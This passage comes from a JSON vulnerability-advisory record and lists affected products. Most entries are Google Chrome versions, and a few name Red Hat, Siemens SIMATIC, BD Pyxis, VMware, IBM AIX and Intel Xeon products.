        "vendor": "google",
        "version": "13.0.782.25"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1062.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0.2.152.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.556.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.12"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.53"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.450.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.119"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.161"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.772.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.322.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.125"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1059.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.29"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.398.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.32"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.404.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.140"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.531.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "47.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.82"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.53"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.33"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.321"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.94"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.45"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.41"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.870.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1006.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.91"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1653.1"
      },
      {
        "model": "pyxis anesthesia es",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.66"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.204"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.58"
      },
      {
        "model": "enterprise linux for power little endian extended update supp",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-7.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.551.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.18"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1083.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.152"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "62.0.3202.89"
      },
      {
        "model": "aix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.301"
      },
      {
        "model": "enterprise linux server tus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-7.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.335"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.695.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.39"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1021"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1688.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.325"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.24"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.732.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.50"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.11"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.58"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1290.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.20"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.26"
      },
      {
        "model": "vcloud usage meter",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "3.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.712.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "49.0.2566.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1286.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.152"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.558.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.98"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.28"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.342.2"
      },
      {
        "model": "simatic ipc827c",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.822.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.40"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.120"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.665.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.31"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.39"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.629.0"
      },
      {
        "model": "sql server r2 for 32-bit systems service pack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "200830"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1012.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.339"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.109"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.335.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.15"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.763.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.10"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.41"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.112"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.947.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.55"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1276.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.168"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.878.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.39"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.42"
      },
      {
        "model": "vsphere data protection",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "6.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.542.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1663.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.48"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.29"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.24"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.62"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.837.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1014"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.43"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.529.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.70"
      },
      {
        "model": "simatic ipc847d",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.39"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.93"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.9"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.324"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.929.0"
      },
      {
        "model": "simatic ipc547g",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.510.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.81"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0.3.1549"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.410.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.79"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.27"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "29.0.1547.48"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.45"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.787.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.323"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.292.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.405.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.212.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.36"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.10"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.684.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.796.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.55"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0.2.153.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.22"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.223.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.35"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0.9.134.14"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.47"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.121"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.38"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1076.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.123"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "29.0.1547.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1307.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.62"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.103"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.120"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.928.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.757.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.360.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.15"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.79"
      },
      {
        "model": "facscelesta",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.20"
      },
      {
        "model": "enterprise linux for ibm z systems extended update support",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-6.7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.55"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.249.78"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.39"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.31"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.74"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.45"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.118"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.97"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.54"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.30"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.42"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.120"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.62"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.40"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "50.0.2661.102"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.70"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.832.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.63"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1066.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.50"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.55"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.48"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.702.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.316"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.49"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.36"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.514.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1284.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.221.8"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.403.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.45"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.307.5"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.55"
      },
      {
        "model": "simatic field pg m5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "43.0.2357"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.29"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.72"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.48"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874102"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.304.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1018.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.360.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1278.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.229"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.572.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.36"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.51"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.146"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.139"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.22"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.25"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.60"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.65"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.76"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1282.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1057.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.47"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5.0.38"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.303.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.49"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.80"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.46"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.777.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.100"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.777.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "3"
      },
      {
        "model": "pyxis scrubstation system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.26"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.63"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.51"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.21"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.20"
      },
      {
        "model": "pyxis anesthesia system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "35000"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.436.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.21"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.76"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1030.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.44"
      },
      {
        "model": "xeon cpu e5-1650",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "intel",
        "version": "v30"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.340"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.45"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1689.2"
      },
      {
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 0.3,
